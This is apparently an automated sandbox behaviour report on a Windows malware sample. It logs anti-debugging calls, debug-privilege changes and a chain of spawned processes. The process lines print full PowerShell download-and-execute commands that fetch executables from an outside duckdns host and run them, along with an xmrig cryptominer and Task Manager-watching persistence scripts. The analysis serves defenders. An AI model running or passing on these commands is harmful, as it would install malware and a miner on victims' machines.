Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: curl.exe, 00000026.00000003.1704174076.0000020ECD734000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP[[P
Source: xmrig.exe, 00000015.00000002.3899633075.000001CD415A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.1528272772.00000237EBE30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1880092416.000001A3E3842000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000001B.00000002.1623996221.0000015ED19DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2118171144.000001DDC13EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C7338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7332C7338
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DCA18 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,strlen,malloc,GetSystemDirectoryA,strlen,strcpy,strlen,strcpy,LoadLibraryA,free, 27_2_00007FF7033DCA18
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D0980 GetProcessHeap, 0_2_00007FF7332D0980
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C7338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7332C7338
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C2170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7332C2170
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C2FB4 SetUnhandledExceptionFilter, 0_2_00007FF7332C2FB4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C2DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7332C2DD0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5732170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00007FF6C5732170
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5737338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF6C5737338
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5732DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF6C5732DD0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5732FB4 SetUnhandledExceptionFilter, 6_2_00007FF6C5732FB4
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FB2E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 27_2_00007FF7033FB2E0
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FB798 SetUnhandledExceptionFilter, 27_2_00007FF7033FB798
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FB5B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 27_2_00007FF7033FB5B8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D2DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_00007FF75C2D2DD0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D2FB4 SetUnhandledExceptionFilter, 31_2_00007FF75C2D2FB4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D2170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 31_2_00007FF75C2D2170
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D7338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_00007FF75C2D7338
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332BADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332BADF0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\6.exe "C:\Users\user\AppData\Roaming\6.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
